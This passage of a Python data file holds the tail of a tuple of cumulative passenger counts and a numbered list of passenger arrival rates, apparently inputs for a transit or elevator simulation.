(604, 521, 532, 513, 494, 231, 221, 212, 256, 117, 85, 40, 0, 600, 564, 379, 311, 464, 267, 226, 126, 268, 179, 110, 48, 0), # 167
(605, 522, 532, 514, 494, 231, 221, 212, 256, 118, 86, 40, 0, 607, 564, 382, 314, 466, 267, 229, 126, 268, 180, 110, 48, 0), # 168
(610, 525, 536, 516, 494, 232, 222, 212, 257, 118, 86, 40, 0, 609, 564, 382, 317, 467, 268, 229, 128, 269, 180, 111, 48, 0), # 169
(610, 527, 537, 518, 497, 232, 222, 212, 259, 118, 86, 40, 0, 611, 565, 384, 318, 468, 269, 229, 128, 269, 180, 112, 48, 0), # 170
(615, 532, 539, 521, 498, 233, 222, 213, 259, 118, 86, 40, 0, 613, 569, 384, 318, 468, 269, 230, 128, 269, 180, 113, 48, 0), # 171
(616, 535, 540, 522, 500, 233, 223, 213, 259, 119, 86, 40, 0, 617, 574, 385, 320, 470, 270, 230, 128, 271, 180, 113, 48, 0), # 172
(617, 536, 541, 524, 502, 233, 225, 214, 259, 119, 86, 40, 0, 618, 576, 385, 321, 472, 270, 230, 128, 271, 181, 113, 48, 0), # 173
(620, 538, 543, 525, 503, 235, 226, 215, 260, 119, 86, 40, 0, 622, 578, 388, 322, 474, 273, 230, 129, 271, 181, 113, 48, 0), # 174
(620, 538, 545, 528, 507, 235, 227, 215, 260, 120, 86, 40, 0, 624, 581, 392, 323, 478, 273, 230, 130, 271, 181, 114, 48, 0), # 175
(620, 539, 550, 532, 508, 236, 228, 217, 263, 121, 87, 40, 0, 625, 582, 393, 323, 481, 273, 230, 130, 272, 182, 114, 48, 0), # 176
(621, 541, 553, 535, 509, 237, 228, 218, 264, 122, 87, 40, 0, 625, 583, 393, 323, 484, 276, 230, 134, 273, 182, 114, 48, 0), # 177
(623, 541, 553, 537, 509, 238, 228, 219, 267, 123, 87, 40, 0, 628, 584, 395, 324, 485, 277, 230, 135, 273, 182, 114, 48, 0), # 178
(623, 541, 553, 537, 509, 238, 228, 219, 267, 123, 87, 40, 0, 628, 584, 395, 324, 485, 277, 230, 135, 273, 182, 114, 48, 0), # 179
)
passenger_arriving_rate = (
(2.0083462313487073, 2.025939138554161, 1.7370944098708356, 1.86440033215903, 1.481249495362563, 0.7323528174753792, 0.8292071230747831, 0.7755293621632372, 0.8120132082890676, 0.3958015015522371, 0.2803510109257069, 0.16326383594353913, 0.0, 2.0335520850313453, 1.7959021953789303, 1.4017550546285344, 1.187404504656711, 1.6240264165781353, 1.085741107028532, 0.8292071230747831, 0.5231091553395566, 0.7406247476812815, 0.6214667773863434, 0.34741888197416715, 0.18417628532310557, 0.0), # 0
(2.1417308608079897, 2.159688921186411, 1.851782197110051, 1.987543275982985, 1.5793307566597963, 0.780729502943263, 0.8838937882527388, 0.8265856204842847, 0.8656327101777213, 0.4218980692277151, 0.29887307573040883, 0.17404055536047852, 0.0, 2.1679166589759418, 1.9144461089652633, 1.4943653786520439, 1.265694207683145, 1.7312654203554425, 1.1572198686779986, 0.8838937882527388, 0.5576639306737593, 0.7896653783298981, 0.6625144253276618, 0.3703564394220102, 0.19633535647149197, 0.0), # 1
(2.2746892035918926, 2.292907895993359, 1.9660140951824712, 2.1101963113994384, 1.6770567929999318, 0.8289131933862371, 0.9383637015921409, 0.8774375413174034, 0.9190382409170065, 0.4478913775020547, 0.31732154325175427, 0.18477442173510186, 0.0, 2.301745931283876, 2.03251863908612, 1.586607716258771, 1.3436741325061639, 1.838076481834013, 1.2284125578443648, 0.9383637015921409, 0.5920808524187409, 0.8385283964999659, 0.7033987704664796, 0.3932028190364943, 0.20844617236303267, 0.0), # 2
(2.406703117258625, 2.4250675173766973, 2.0793369564399518, 2.231872922259622, 1.774043113600507, 0.8767128119365264, 0.9924007283295911, 0.9278835262490847, 0.9720180214561457, 0.4736782698426182, 0.3356232274551589, 0.1954228561643487, 0.0, 2.4345091225016904, 2.1496514178078354, 1.6781161372757945, 1.4210348095278542, 1.9440360429122914, 1.2990369367487185, 0.9924007283295911, 0.6262234370975188, 0.8870215568002535, 0.7439576407532075, 0.41586739128799033, 0.2204606833978816, 0.0), # 3
(2.537254459366393, 2.555639239738117, 2.1912976332343455, 2.352086592414771, 1.8699052276790646, 0.9239372817263559, 1.0457887337016918, 0.9777219768658193, 1.024360272744361, 0.499155589716768, 0.3537049423060384, 0.20594327974515883, 0.0, 2.565675453175927, 2.2653760771967466, 1.7685247115301916, 1.4974667691503036, 2.048720545488722, 1.368810767612147, 1.0457887337016918, 0.6599552012331114, 0.9349526138395323, 0.7840288641382572, 0.4382595266468692, 0.23233083997619253, 0.0), # 4
(2.6658250874734044, 2.6840945174793154, 2.3014429779175063, 2.470350805716118, 1.9642586444531411, 0.9703955258879502, 1.0983115829450447, 1.0267512947540989, 1.0758532157308744, 0.5242201805918665, 0.37149350176980883, 0.21629311357447162, 0.0, 2.694714143853131, 2.3792242493191873, 1.8574675088490442, 1.572660541775599, 2.151706431461749, 1.4374518126557383, 1.0983115829450447, 0.6931396613485358, 0.9821293222265706, 0.8234502685720396, 0.46028859558350127, 0.24400859249811963, 0.0), # 5
(2.7918968591378666, 2.8099048050019837, 2.4093198428412888, 2.586179046014896, 2.0567188731402783, 1.015896467553535, 1.1497531412962525, 1.0747698815004147, 1.1262850713649086, 0.548768885935276, 0.3889157198118855, 0.22642977874922698, 0.0, 2.821094415079843, 2.4907275662414965, 1.9445785990594275, 1.6463066578058276, 2.2525701427298173, 1.5046778341005806, 1.1497531412962525, 0.7256403339668107, 1.0283594365701392, 0.8620596820049655, 0.4818639685682578, 0.25544589136381673, 0.0), # 6
(2.9149516319179876, 2.932541556707815, 2.514475080357545, 2.699084797162339, 2.146901422958014, 1.0602490298553349, 1.199897273991917, 1.1215761386912588, 1.175444060595686, 0.5726985492143588, 0.40589841039768465, 0.23631069636636431, 0.0, 2.944285487402608, 2.599417660030007, 2.029492051988423, 1.718095647643076, 2.350888121191372, 1.5702065941677623, 1.199897273991917, 0.7573207356109535, 1.073450711479007, 0.8996949323874465, 0.5028950160715091, 0.26659468697343774, 0.0), # 7
(3.034471263371974, 3.051476226998503, 2.616455542818132, 2.8085815430096783, 2.2344218031238894, 1.1032621359255743, 1.2485278462686396, 1.166968467913121, 1.2231184043724275, 0.5959060138964776, 0.42236838749262146, 0.24589328752282347, 0.0, 3.063756581367967, 2.7048261627510577, 2.111841937463107, 1.7877180416894323, 2.446236808744855, 1.6337558550783693, 1.2485278462686396, 0.7880443828039817, 1.1172109015619447, 0.936193847669893, 0.5232911085636265, 0.2774069297271367, 0.0), # 8
(3.149937611058034, 3.1661802702757416, 2.7148080825749017, 2.9141827674081506, 2.3188955228554424, 1.1447447088964797, 1.295428723363024, 1.210745270752494, 1.2690963236443564, 0.6182881234489943, 0.4382524650621119, 0.25513497331554386, 0.0, 3.178976917522465, 2.8064847064709815, 2.1912623253105594, 1.8548643703469825, 2.538192647288713, 1.6950433790534916, 1.295428723363024, 0.817674792068914, 1.1594477614277212, 0.9713942558027171, 0.5429616165149803, 0.28783457002506746, 0.0), # 9
(3.2608325325343728, 3.276125140941222, 2.8090795519797083, 3.0154019542089863, 2.3999380913702133, 1.1845056719002751, 1.340383770511671, 1.2527049487958686, 1.3131660393606952, 0.6397417213392715, 0.45347745707157167, 0.2639931748414651, 0.0, 3.2894157164126443, 2.903924923256116, 2.267387285357858, 1.9192251640178144, 2.6263320787213904, 1.7537869283142162, 1.340383770511671, 0.8460754799287679, 1.1999690456851067, 1.005133984736329, 0.5618159103959417, 0.2978295582673839, 0.0), # 10
(3.3666378853592023, 3.3807822933966425, 2.8988168033844053, 3.1117525872634193, 2.477165017885742, 1.222353948069186, 1.3831768529511832, 1.292645903629736, 1.3551157724706657, 0.660163651034672, 0.46797017748641667, 0.27242531319752705, 0.0, 3.394542198585045, 2.996678445172797, 2.339850887432083, 1.9804909531040158, 2.7102315449413314, 1.8097042650816304, 1.3831768529511832, 0.8731099629065614, 1.238582508942871, 1.03725086242114, 0.5797633606768812, 0.30734384485424027, 0.0), # 11
(3.466835527090725, 3.479623182043689, 2.9835666891408468, 3.202748150422684, 2.550191811619567, 1.2580984605354364, 1.4235918359181623, 1.3303665368405868, 1.3947337439234906, 0.6794507560025573, 0.48165744027206236, 0.28038880948066897, 0.0, 3.493825584586214, 3.0842769042873583, 2.4082872013603116, 2.0383522680076718, 2.789467487846981, 1.8625131515768216, 1.4235918359181623, 0.8986417575253116, 1.2750959058097835, 1.0675827168075616, 0.5967133378281694, 0.31632938018579, 0.0), # 12
(3.5609073152871504, 3.572119261284061, 3.062876061600887, 3.2879021275380134, 2.618633981789227, 1.2915481324312523, 1.4614125846492112, 1.3656652500149136, 1.431808174668391, 0.6974998797102906, 0.49446605939392463, 0.2878410847878307, 0.0, 3.586735094962694, 3.1662519326661376, 2.472330296969623, 2.0924996391308714, 2.863616349336782, 1.9119313500208792, 1.4614125846492112, 0.9225343803080374, 1.3093169908946134, 1.0959673758460047, 0.6125752123201775, 0.3247381146621874, 0.0), # 13
(3.6483351075066865, 3.6577419855194493, 3.1362917731163824, 3.366728002460638, 2.6821070376122638, 1.3225118868888581, 1.4964229643809324, 1.3983404447392078, 1.4661272856545895, 0.7142078656252335, 0.5063228488174191, 0.29473956021595205, 0.0, 3.6727399502610254, 3.242135162375472, 2.531614244087095, 2.1426235968757004, 2.932254571309179, 1.9576766226348912, 1.4964229643809324, 0.9446513477777557, 1.3410535188061319, 1.1222426674868795, 0.6272583546232765, 0.33252199868358634, 0.0), # 14
(3.728600761307542, 3.7359628091515464, 3.203360676039181, 3.438739259041796, 2.7402264883062153, 1.3507986470404796, 1.5284068403499251, 1.4281905225999594, 1.4974792978313092, 0.7294715572147492, 0.5171546225079614, 0.30104165686197243, 0.0, 3.7513093710277525, 3.311458225481696, 2.5857731125398065, 2.188414671644247, 2.9949585956626184, 1.9994667316399433, 1.5284068403499251, 0.9648561764574853, 1.3701132441531076, 1.1462464196805988, 0.6406721352078363, 0.33963298265014064, 0.0), # 15
(3.8011861342479203, 3.806253186582049, 3.263629622721142, 3.5034493811327145, 2.792607843088622, 1.3762173360183407, 1.5571480777927953, 1.4550138851836603, 1.5256524321477714, 0.7431877979461997, 0.5268881944309676, 0.3067047958228314, 0.0, 3.8219125778094183, 3.3737527540511447, 2.6344409721548376, 2.229563393838599, 3.0513048642955427, 2.0370194392571244, 1.5571480777927953, 0.9830123828702433, 1.396303921544311, 1.1678164603775718, 0.6527259245442284, 0.3460230169620045, 0.0), # 16
(3.86557308388603, 3.868084572212647, 3.3166454655141178, 3.560371852584634, 2.8388666111770235, 1.3985768769546667, 1.5824305419461422, 1.4786089340768032, 1.5504349095531977, 0.755253431286947, 0.5354503785518533, 0.31168639819546856, 0.0, 3.8840187911525663, 3.4285503801501536, 2.6772518927592666, 2.2657602938608403, 3.1008698191063955, 2.0700525077075245, 1.5824305419461422, 0.9989834835390476, 1.4194333055885118, 1.1867906175282115, 0.6633290931028236, 0.35164405201933163, 0.0), # 17
(3.921243467780082, 3.920928420445034, 3.3619550567699603, 3.609020157248784, 2.878618301788957, 1.4176861929816842, 1.6040380980465703, 1.4987740708658768, 1.5716149509968127, 0.7655653007043539, 0.542767988836034, 0.31594388507682386, 0.0, 3.9370972316037385, 3.475382735845062, 2.7138399441801697, 2.2966959021130613, 3.1432299019936254, 2.0982836992122276, 1.6040380980465703, 1.0126329949869173, 1.4393091508944784, 1.203006719082928, 0.672391011353992, 0.35644803822227583, 0.0), # 18
(3.9676791434882794, 3.964256185680906, 3.399105248840526, 3.648907778976395, 2.911478424141964, 1.4333542072316154, 1.6217546113306789, 1.5153076971373745, 1.5889807774278373, 0.7740202496657831, 0.5487678392489254, 0.3194346775638366, 0.0, 3.9806171197094784, 3.513781453202202, 2.7438391962446262, 2.3220607489973486, 3.1779615548556746, 2.1214307759923243, 1.6217546113306789, 1.0238244337368683, 1.455739212070982, 1.2163025929921318, 0.6798210497681053, 0.3603869259709915, 0.0), # 19
(4.0043619685688325, 3.997539322321953, 3.427642894077668, 3.679548201618706, 2.9370624874535847, 1.4453898428366878, 1.6353639470350725, 1.5280082144777862, 1.6023206097954932, 0.7805151216385962, 0.5533767437559435, 0.32211619675344644, 0.0, 4.01404767601633, 3.54327816428791, 2.766883718779717, 2.341545364915788, 3.2046412195909864, 2.139211500268901, 1.6353639470350725, 1.0324213163119198, 1.4685312437267923, 1.2265160672062356, 0.6855285788155336, 0.36341266566563213, 0.0), # 20
(4.030773800579946, 4.020249284769871, 3.44711484483324, 3.700454909026946, 2.954986000941357, 1.453602022929125, 1.644649970396352, 1.5366740244736041, 1.611422669049003, 0.7849467600901557, 0.556521516322504, 0.32394586374259315, 0.0, 4.036858121070831, 3.5634045011685243, 2.78260758161252, 2.3548402802704667, 3.222845338098006, 2.151343634263046, 1.644649970396352, 1.0382871592350893, 1.4774930004706786, 1.233484969675649, 0.689422968966648, 0.365477207706352, 0.0), # 21
(4.046396497079832, 4.031857527426353, 3.457067953459095, 3.7111413850523514, 2.96486447382282, 1.4577996706411525, 1.64939654665112, 1.5411035287113193, 1.6160751761375887, 0.7872120084878245, 0.5581289709140228, 0.3248810996282164, 0.0, 4.048517675419531, 3.5736920959103795, 2.7906448545701137, 2.361636025463473, 3.2321503522751773, 2.157544940195847, 1.64939654665112, 1.0412854790293946, 1.48243223691141, 1.237047128350784, 0.6914135906918191, 0.3665325024933049, 0.0), # 22
(4.052157345337056, 4.0332319844535895, 3.4583077274805674, 3.712479243827161, 2.9673952149420257, 1.4583333333333335, 1.6499608004518678, 1.5415823045267492, 1.6166568312757204, 0.7874792272519435, 0.5583305358107827, 0.3249965858862978, 0.0, 4.05, 3.574962444749276, 2.7916526790539136, 2.36243768175583, 3.2333136625514407, 2.158215226337449, 1.6499608004518678, 1.0416666666666667, 1.4836976074710129, 1.2374930812757206, 0.6916615454961136, 0.36665745313214454, 0.0), # 23
(4.056404965213662, 4.03243024691358, 3.4581049382716054, 3.7123145833333338, 2.9688286969639606, 1.4583333333333335, 1.6496507625272334, 1.5409166666666667, 1.6165788888888888, 0.7873150617283953, 0.5583083052749721, 0.3249695473251029, 0.0, 4.05, 3.5746650205761314, 2.7915415263748606, 2.361945185185185, 3.2331577777777776, 2.1572833333333334, 1.6496507625272334, 1.0416666666666667, 1.4844143484819803, 1.2374381944444448, 0.6916209876543211, 0.3665845679012346, 0.0), # 24
(4.060562892084632, 4.030849908550525, 3.457704618198446, 3.7119888117283955, 2.970230652158534, 1.4583333333333335, 1.649039780521262, 1.5396090534979427, 1.6164248971193418, 0.7869918838591681, 0.5582642266284242, 0.3249161713153483, 0.0, 4.05, 3.5740778844688306, 2.7913211331421213, 2.3609756515775038, 3.2328497942386836, 2.15545267489712, 1.649039780521262, 1.0416666666666667, 1.485115326079267, 1.2373296039094654, 0.6915409236396892, 0.36644090077732056, 0.0), # 25
(4.0646308076192135, 4.028515112025606, 3.457112254229539, 3.711505632716049, 2.9716010315789614, 1.4583333333333335, 1.6481373436617444, 1.5376841563786012, 1.61619683127572, 0.7865150708733427, 0.5581986989233904, 0.3248371894528274, 0.0, 4.05, 3.573209083981101, 2.7909934946169517, 2.3595452126200276, 3.23239366255144, 2.152757818930042, 1.6481373436617444, 1.0416666666666667, 1.4858005157894807, 1.2371685442386833, 0.6914224508459078, 0.3662286465477825, 0.0), # 26
(4.068608393486655, 4.02545, 3.4563333333333333, 3.71086875, 2.972939786278457, 1.4583333333333335, 1.6469529411764707, 1.5351666666666668, 1.6158966666666665, 0.7858900000000002, 0.5581121212121213, 0.32473333333333343, 0.0, 4.05, 3.572066666666667, 2.7905606060606063, 2.3576699999999997, 3.231793333333333, 2.1492333333333336, 1.6469529411764707, 1.0416666666666667, 1.4864698931392284, 1.2369562500000002, 0.6912666666666667, 0.36595000000000005, 0.0), # 27
(4.0724953313562, 4.021678715134888, 3.4553733424782807, 3.710081867283951, 2.9742468673102405, 1.4583333333333335, 1.6454960622932302, 1.532081275720165, 1.615526378600823, 0.7851220484682215, 0.558004892546868, 0.3246053345526597, 0.0, 4.05, 3.5706586800792564, 2.7900244627343396, 2.355366145404664, 3.231052757201646, 2.144913786008231, 1.6454960622932302, 1.0416666666666667, 1.4871234336551202, 1.2366939557613172, 0.6910746684956562, 0.3656071559213535, 0.0), # 28
(4.0762913028971, 4.01722540009145, 3.4542377686328307, 3.709148688271605, 2.9755222257275253, 1.4583333333333335, 1.6437761962398132, 1.5284526748971192, 1.6150879423868312, 0.7842165935070876, 0.5578774119798812, 0.3244539247065996, 0.0, 4.05, 3.568993171772595, 2.789387059899406, 2.3526497805212623, 3.2301758847736624, 2.139833744855967, 1.6437761962398132, 1.0416666666666667, 1.4877611128637627, 1.2363828960905352, 0.6908475537265663, 0.36520230909922274, 0.0), # 29
(4.079995989778599, 4.012114197530865, 3.452932098765432, 3.7080729166666666, 2.9767658125835297, 1.4583333333333335, 1.6418028322440088, 1.5243055555555556, 1.6145833333333333, 0.7831790123456793, 0.557730078563412, 0.3242798353909465, 0.0, 4.05, 3.5670781893004113, 2.78865039281706, 2.349537037037037, 3.2291666666666665, 2.134027777777778, 1.6418028322440088, 1.0416666666666667, 1.4883829062917648, 1.2360243055555558, 0.6905864197530864, 0.36473765432098776, 0.0), # 30
(4.083609073669943, 4.006369250114313, 3.4514618198445364, 3.70685825617284, 2.977977578931469, 1.4583333333333335, 1.639585459533608, 1.519664609053498, 1.6140145267489712, 0.7820146822130776, 0.5575632913497112, 0.32408379820149374, 0.0, 4.05, 3.564921780216431, 2.7878164567485557, 2.346044046639232, 3.2280290534979423, 2.1275304526748973, 1.639585459533608, 1.0416666666666667, 1.4889887894657345, 1.2356194187242802, 0.6902923639689073, 0.36421538637402845, 0.0), # 31
(4.087130236240382, 4.000014700502972, 3.4498324188385916, 3.7055084104938274, 2.979157475824559, 1.4583333333333335, 1.6371335673363998, 1.5145545267489715, 1.613383497942387, 0.7807289803383634, 0.5573774493910297, 0.32386654473403453, 0.0, 4.05, 3.5625319920743794, 2.7868872469551484, 2.3421869410150893, 3.226766995884774, 2.12037633744856, 1.6371335673363998, 1.0416666666666667, 1.4895787379122796, 1.2351694701646094, 0.6899664837677183, 0.3636377000457248, 0.0), # 32
(4.090559159159159, 3.993074691358024, 3.4480493827160497, 3.704027083333333, 2.9803054543160163, 1.4583333333333335, 1.6344566448801743, 1.5090000000000001, 1.6126922222222222, 0.7793272839506176, 0.5571729517396184, 0.32362880658436216, 0.0, 4.05, 3.559916872427983, 2.785864758698092, 2.3379818518518523, 3.2253844444444444, 2.1126000000000005, 1.6344566448801743, 1.0416666666666667, 1.4901527271580082, 1.2346756944444446, 0.68960987654321, 0.36300679012345677, 0.0), # 33
(4.093895524095524, 3.985573365340649, 3.446118198445359, 3.702417978395062, 2.9814214654590576, 1.4583333333333335, 1.631564181392722, 1.503025720164609, 1.6119426748971197, 0.7778149702789212, 0.5569501974477283, 0.3233713153482701, 0.0, 4.05, 3.557084468830971, 2.784750987238642, 2.333444910836763, 3.2238853497942395, 2.1042360082304525, 1.631564181392722, 1.0416666666666667, 1.4907107327295288, 1.2341393261316875, 0.6892236396890719, 0.3623248513946045, 0.0), # 34
(4.097139012718723, 3.977534865112025, 3.4440443529949705, 3.700684799382716, 2.9825054603068986, 1.4583333333333335, 1.6284656661018317, 1.4966563786008233, 1.6111368312757204, 0.7761974165523551, 0.5567095855676103, 0.32309480262155166, 0.0, 4.05, 3.554042828837068, 2.7835479278380513, 2.3285922496570644, 3.2222736625514408, 2.0953189300411528, 1.6284656661018317, 1.0416666666666667, 1.4912527301534493, 1.2335615997942388, 0.6888088705989942, 0.3615940786465478, 0.0), # 35
(4.100289306698002, 3.9689833333333326, 3.4418333333333337, 3.69883125, 2.983557389912756, 1.4583333333333335, 1.625170588235294, 1.489916666666667, 1.6102766666666666, 0.7744800000000003, 0.5564515151515153, 0.3228000000000001, 0.0, 4.05, 3.5508000000000006, 2.782257575757576, 2.32344, 3.220553333333333, 2.0858833333333338, 1.625170588235294, 1.0416666666666667, 1.491778694956378, 1.2329437500000002, 0.6883666666666668, 0.3608166666666667, 0.0), # 36
(4.10334608770261, 3.9599429126657517, 3.4394906264288982, 3.6968610339506176, 2.984577205329846, 1.4583333333333335, 1.6216884370208988, 1.4828312757201647, 1.609364156378601, 0.7726680978509377, 0.5561763852516941, 0.3224876390794087, 0.0, 4.05, 3.547364029873495, 2.7808819262584703, 2.3180042935528125, 3.218728312757202, 2.0759637860082307, 1.6216884370208988, 1.0416666666666667, 1.492288602664923, 1.2322870113168727, 0.6878981252857798, 0.3599948102423411, 0.0), # 37
(4.1063090374017905, 3.9504377457704623, 3.4370217192501147, 3.6947778549382724, 2.985564857611384, 1.4583333333333335, 1.6180287016864359, 1.4754248971193418, 1.6084012757201647, 0.7707670873342481, 0.5558845949203975, 0.32215845145557087, 0.0, 4.05, 3.543742966011279, 2.7794229746019874, 2.3123012620027437, 3.2168025514403293, 2.0655948559670785, 1.6180287016864359, 1.0416666666666667, 1.492782428805692, 1.2315926183127577, 0.6874043438500229, 0.35913070416095116, 0.0), # 38
(4.109177837464794, 3.940491975308642, 3.434432098765433, 3.6925854166666667, 2.9865202978105874, 1.4583333333333335, 1.6142008714596952, 1.4677222222222224, 1.60739, 0.7687823456790126, 0.5555765432098766, 0.32181316872427984, 0.0, 4.05, 3.539944855967078, 2.777882716049383, 2.306347037037037, 3.21478, 2.0548111111111114, 1.6142008714596952, 1.0416666666666667, 1.4932601489052937, 1.2308618055555558, 0.6868864197530866, 0.3582265432098766, 0.0), # 39
(4.111952169560865, 3.930129743941472, 3.4317272519433013, 3.690287422839506, 2.9874434769806717, 1.4583333333333335, 1.6102144355684662, 1.4597479423868318, 1.606332304526749, 0.7667192501143122, 0.5552526291723824, 0.32145252248132916, 0.0, 4.05, 3.5359777472946203, 2.7762631458619116, 2.300157750342936, 3.212664609053498, 2.0436471193415646, 1.6102144355684662, 1.0416666666666667, 1.4937217384903358, 1.230095807613169, 0.6863454503886602, 0.3572845221764975, 0.0), # 40
(4.114631715359251, 3.919375194330132, 3.4289126657521725, 3.6878875771604944, 2.988334346174854, 1.4583333333333335, 1.606078883240539, 1.4515267489711936, 1.6052301646090534, 0.7645831778692275, 0.5549132518601656, 0.3210772443225119, 0.0, 4.05, 3.53184968754763, 2.7745662593008276, 2.2937495336076816, 3.210460329218107, 2.0321374485596713, 1.606078883240539, 1.0416666666666667, 1.494167173087427, 1.2292958590534984, 0.6857825331504345, 0.3563068358481939, 0.0), # 41
(4.1172161565292, 3.908252469135803, 3.425993827160495, 3.685389583333334, 2.9891928564463486, 1.4583333333333335, 1.6018037037037036, 1.4430833333333335, 1.6040855555555558, 0.7623795061728398, 0.5545588103254772, 0.3206880658436215, 0.0, 4.05, 3.5275687242798353, 2.7727940516273852, 2.2871385185185185, 3.2081711111111115, 2.020316666666667, 1.6018037037037036, 1.0416666666666667, 1.4945964282231743, 1.2284631944444449, 0.685198765432099, 0.35529567901234577, 0.0), # 42
(4.119705174739957, 3.8967857110196618, 3.4229762231367173, 3.6827971450617287, 2.990018958848374, 1.4583333333333335, 1.5973983861857501, 1.434442386831276, 1.6029004526748971, 0.7601136122542298, 0.5541897036205679, 0.32028571864045124, 0.0, 4.05, 3.523142905044963, 2.770948518102839, 2.2803408367626887, 3.2058009053497942, 2.0082193415637866, 1.5973983861857501, 1.0416666666666667, 1.495009479424187, 1.2275990483539099, 0.6845952446273434, 0.35425324645633294, 0.0), # 43
(4.122098451660771, 3.8849990626428896, 3.4198653406492916, 3.680113966049383, 2.9908126044341454, 1.4583333333333335, 1.592872419914468, 1.4256286008230457, 1.6016768312757201, 0.7577908733424785, 0.5538063307976889, 0.3198709343087945, 0.0, 4.05, 3.5185802773967385, 2.7690316539884443, 2.273372620027435, 3.2033536625514403, 1.9958800411522641, 1.592872419914468, 1.0416666666666667, 1.4954063022170727, 1.2267046553497947, 0.6839730681298584, 0.35318173296753547, 0.0), # 44
(4.1243956689608865, 3.872916666666667, 3.4166666666666674, 3.6773437500000004, 2.991573744256879, 1.4583333333333335, 1.5882352941176472, 1.416666666666667, 1.6004166666666664, 0.755416666666667, 0.553409090909091, 0.3194444444444445, 0.0, 4.05, 3.5138888888888884, 2.7670454545454546, 2.2662500000000003, 3.2008333333333328, 1.9833333333333336, 1.5882352941176472, 1.0416666666666667, 1.4957868721284395, 1.2257812500000003, 0.6833333333333335, 0.3520833333333334, 0.0), # 45
(4.126596508309553, 3.8605626657521714, 3.4133856881572933, 3.674490200617284, 2.992302329369791, 1.4583333333333335, 1.5834964980230777, 1.407581275720165, 1.5991219341563785, 0.7529963694558759, 0.552998383007025, 0.3190069806431947, 0.0, 4.05, 3.509076787075141, 2.7649919150351248, 2.258989108367627, 3.198243868312757, 1.970613786008231, 1.5834964980230777, 1.0416666666666667, 1.4961511646848955, 1.2248300668724283, 0.6826771376314588, 0.35096024234110657, 0.0), # 46
(4.128700651376014, 3.8479612025605854, 3.4100278920896208, 3.6715570216049382, 2.992998310826098, 1.4583333333333335, 1.5786655208585494, 1.3983971193415639, 1.597794609053498, 0.7505353589391863, 0.552574606143742, 0.3185592745008384, 0.0, 4.05, 3.5041520195092213, 2.7628730307187097, 2.2516060768175583, 3.195589218106996, 1.9577559670781894, 1.5786655208585494, 1.0416666666666667, 1.496499155413049, 1.2238523405349797, 0.6820055784179242, 0.3498146547782351, 0.0), # 47
(4.130707779829518, 3.835136419753087, 3.4065987654320993, 3.6685479166666672, 2.993661639679016, 1.4583333333333335, 1.5737518518518518, 1.3891388888888891, 1.5964366666666667, 0.7480390123456792, 0.5521381593714928, 0.31810205761316873, 0.0, 4.05, 3.4991226337448555, 2.7606907968574634, 2.244117037037037, 3.1928733333333335, 1.944794444444445, 1.5737518518518518, 1.0416666666666667, 1.496830819839508, 1.222849305555556, 0.6813197530864199, 0.34864876543209883, 0.0), # 48
(4.132617575339315, 3.8221124599908545, 3.403103795153178, 3.665466589506173, 2.9942922669817618, 1.4583333333333335, 1.5687649802307755, 1.3798312757201647, 1.5950500823045266, 0.7455127069044355, 0.5516894417425283, 0.31763606157597934, 0.0, 4.05, 3.4939966773357725, 2.7584472087126413, 2.2365381207133064, 3.190100164609053, 1.9317637860082308, 1.5687649802307755, 1.0416666666666667, 1.4971461334908809, 1.221822196502058, 0.6806207590306357, 0.34746476909007773, 0.0), # 49
(4.134429719574647, 3.8089134659350714, 3.399548468221308, 3.6623167438271604, 2.9948901437875506, 1.4583333333333335, 1.56371439522311, 1.3704989711934157, 1.5936368312757199, 0.742961819844536, 0.5512288523090992, 0.3171620179850633, 0.0, 4.05, 3.4887821978356963, 2.7561442615454963, 2.2288854595336076, 3.1872736625514397, 1.9186985596707822, 1.56371439522311, 1.0416666666666667, 1.4974450718937753, 1.220772247942387, 0.6799096936442617, 0.346264860539552, 0.0), # 50
(4.136143894204764, 3.7955635802469136, 3.3959382716049387, 3.659102083333334, 2.9954552211495997, 1.4583333333333335, 1.558609586056645, 1.3611666666666666, 1.592198888888889, 0.7403917283950618, 0.5507567901234569, 0.31668065843621407, 0.0, 4.05, 3.483487242798354, 2.7537839506172843, 2.221175185185185, 3.184397777777778, 1.9056333333333335, 1.558609586056645, 1.0416666666666667, 1.4977276105747999, 1.2197006944444448, 0.6791876543209877, 0.34505123456790127, 0.0), # 51
(4.137759780898912, 3.782086945587563, 3.39227869227252, 3.6558263117283953, 2.995987450121124, 1.4583333333333335, 1.5534600419591706, 1.3518590534979422, 1.590738230452675, 0.7378078097850939, 0.5502736542378519, 0.3161927145252249, 0.0, 4.05, 3.4781198597774736, 2.7513682711892593, 2.2134234293552812, 3.18147646090535, 1.8926026748971192, 1.5534600419591706, 1.0416666666666667, 1.497993725060562, 1.218608770576132, 0.678455738454504, 0.3438260859625058, 0.0), # 52
(4.139277061326338, 3.768507704618199, 3.388575217192502, 3.6524931327160495, 2.996486781755341, 1.4583333333333335, 1.5482752521584766, 1.3426008230452677, 1.5892568312757203, 0.735215441243713, 0.5497798437045351, 0.3156989178478891, 0.0, 4.05, 3.4726880963267797, 2.7488992185226753, 2.2056463237311386, 3.1785136625514405, 1.8796411522633747, 1.5482752521584766, 1.0416666666666667, 1.4982433908776704, 1.21749771090535, 0.6777150434385005, 0.3425916095107454, 0.0), # 53
(4.140695417156286, 3.7548500000000002, 3.3848333333333334, 3.64910625, 2.996953167105467, 1.4583333333333335, 1.543064705882353, 1.3334166666666667, 1.5877566666666667, 0.7326200000000002, 0.5492757575757575, 0.31520000000000004, 0.0, 4.05, 3.4672, 2.7463787878787875, 2.1978600000000004, 3.1755133333333334, 1.8667833333333332, 1.543064705882353, 1.0416666666666667, 1.4984765835527336, 1.2163687500000002, 0.6769666666666667, 0.3413500000000001, 0.0), # 54
(4.142014530058009, 3.741137974394147, 3.381058527663466, 3.6456693672839506, 2.997386557224717, 1.4583333333333335, 1.5378378923585896, 1.3243312757201646, 1.5862397119341562, 0.7300268632830363, 0.5487617949037703, 0.31469669257735106, 0.0, 4.05, 3.4616636183508613, 2.743808974518851, 2.1900805898491087, 3.1724794238683125, 1.8540637860082305, 1.5378378923585896, 1.0416666666666667, 1.4986932786123586, 1.2152231224279837, 0.6762117055326933, 0.34010345221764976, 0.0), # 55
(4.143234081700749, 3.7273957704618197, 3.377256287151349, 3.642186188271605, 2.9977869031663094, 1.4583333333333335, 1.5326043008149763, 1.3153693415637862, 1.584707942386831, 0.7274414083219024, 0.5482383547408239, 0.31418972717573546, 0.0, 4.05, 3.4560869989330896, 2.7411917737041196, 2.182324224965707, 3.169415884773662, 1.8415170781893007, 1.5326043008149763, 1.0416666666666667, 1.4988934515831547, 1.2140620627572019, 0.6754512574302699, 0.33885416095107457, 0.0), # 56
